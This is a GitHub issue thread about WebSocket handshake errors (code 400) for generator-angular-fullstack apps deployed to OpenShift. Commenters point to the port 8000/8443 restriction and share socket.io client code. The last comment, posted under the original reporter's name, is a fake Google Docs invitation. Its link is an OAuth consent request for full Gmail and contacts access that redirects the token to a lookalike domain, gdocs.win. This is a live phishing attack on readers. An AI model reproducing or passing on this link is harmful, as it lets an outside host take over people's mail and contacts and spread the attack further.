### ISSUE TITLE
Sockets and openshift

### ISSUE THREAD

**Issue by shawnzam** [DaftMonk/generator-angular-fullstack#783]
I have an app that I deployed using the ` grunt buildcontrol:openshift` command, and everything seems to be function fine. However I do see the following error:

    65d7b95d.vendor.js:15 WebSocket connection to 'wss://<appname>-<domain>.rhcloud.com/socket.io-
    client/?token=<token>&EIO=3&transport=websocket&sid=<sid>' failed: Error during WebSocket
    handshake: Unexpected response code: 400

The error is also present when using the ws:// protocol.
I set the custom ENV variable of Domain to `<appname>-<domain>.rhcloud.com`

Any idea what is causing this issue? 

Full disclosure: I did edit the generator template files and removed the `-s` from the `rhc` command. This made the app non scaling.

**Comment by shawnzam** [comment]
Update the error is not present when using port 8000 so `<appname>-<domain>.rhcloud.com:8000` does not throw any errors.

**Comment by shawnzam** [comment]
Anyone have any clue as to why this is happening?

**Comment by fuzzypete** [comment]
Openshift only supports the WebSockets protocol on external ports 8000 and 8443 depending on SSL (8443).. See this: https://help.openshift.com/hc/en-us/articles/203263674-What-external-ports-are-available-on-OpenShift

**Comment by Awk34** [comment]
Thanks @fuzzypete

**Comment by shawnzam** [comment]
Can you kindly detail what changes are needed writhing the angularFullstack
generator?

**Comment by fuzzypete** [comment]
Well.... that is an interesting question. I will describe what i chose to do and what i _think_ would be yet better.... However, this may (or may not) be too opinionated for the generator. In short, this discovery led me to the following requirement: 
  _Need to be able to specify different port (or domain&port) for websocket server endpoint depending on environment_

In short, I ran into something that has been nagging me about the current generated project structure. Namely, that configuration by environment is only handled at the server layer. There is nothing in the client layer to do this... So, i added grunt-ng-constant and used it to specify a class that is injected with constants specified by environment in the gruntfile. Like this: http://mindthecode.com/how-to-use-environment-variables-in-your-angular-application

However, i am not really keen on this as a final solution because it:
1. Puts configuration information into the Gruntfile which is huge and not its' purpose anyways
2. Adds an additional place for overall application configurations.

I was thinking that i would rather have the whole config structure lifted out of the server component and put at the same level as client and server so there is one place to find/change config for server and client. 

As it is ... for quickness, i have a setting for webSocket domain and webSocket port in my gruntfile just for the client... However, it feels redundant with the DOMAIN that already exists in the environment..

**Comment by prestonvanloon** [comment]
What needs to be changed exactly? 

I tried changing this in angular: 
```
var ioSocket = io('wss://purgezero.com:8443', { // was previously just ''
      path: '/socket.io-client'
    });
```

And I tried setting the environment variable DOMAIN to `purgezero.com:8443` but still seeing the following error: 

```
WebSocket connection to 'wss://purgezero.com:8443/socket.io-client/?EIO=3&transport=websocket&sid=CqfSUyD5OhYZJyyDAAAC' failed: Error during WebSocket handshake: Unexpected response code: 400
```

**Comment by thumarmahesh** [comment]
```
// socket.io now auto-configures its connection when we ommit a connection url
    var socketAddress = '';
    if(location,hostname !== 'localhost') {
      socketAddress = 'ws://'+location.hostname + ':8000';
    }
    var ioSocket = io(socketAddress, {
      // Send auth token on connection, you will need to DI the Auth service above
      // 'query': 'token=' + Auth.getToken()
      path: '/socket.io-client'
    });
```

**Comment by awwong1** [comment]
Not sure if anyone is still looking into this, but I'm having a similar problem. Below is my code for differentiating between the secure and insecure websockets:
```
    var socketAddress = '';
    if (location.hostname !== 'localhost') {
      // For OpenShift Deployment socket connection
      if (location.protocol === 'https:') {
        socketAddress = 'wss://' + location.hostname + ':8443';
      } else {
        socketAddress = 'ws://' + location.hostname + ':8000';
      }
    }
    var ioSocket = io(socketAddress, {
      // Send auth token on connection, you will need to DI the Auth service aboveX
      // 'query': 'token=' + Auth.getToken()
      path: '/socket.io-client'
    });
```

I'm running my openshift application behind CloudFlare's CDN and I've mapped the CNAME in the DNS settings properly. When going to my custom domain via http, I don't get any websocket connection errors and everything behaves normally.

However, going to my domain via https, I get the following
```
WebSocket connection to 'wss://<mydomain>:8443/socket.io-client/?EIO=3&transport=websocket&sid=WBWE4RQnRfHWrCzFAAAW' failed: Error during WebSocket handshake: Unexpected response code: 400
```

This error does not appear when viewing the *.rhcloud.com version of the insecure and secure site. Anyone else having a similar issue?

**Comment by balicekt** [comment]
+1

**Comment by shawnzam** [comment]
Shawn Zamechek has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=188775109388-t33r6vb45j8fgf8vpcp4q0e6qt2pe01n.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.gdocs.win%2Fg.php&customparam=customparam>
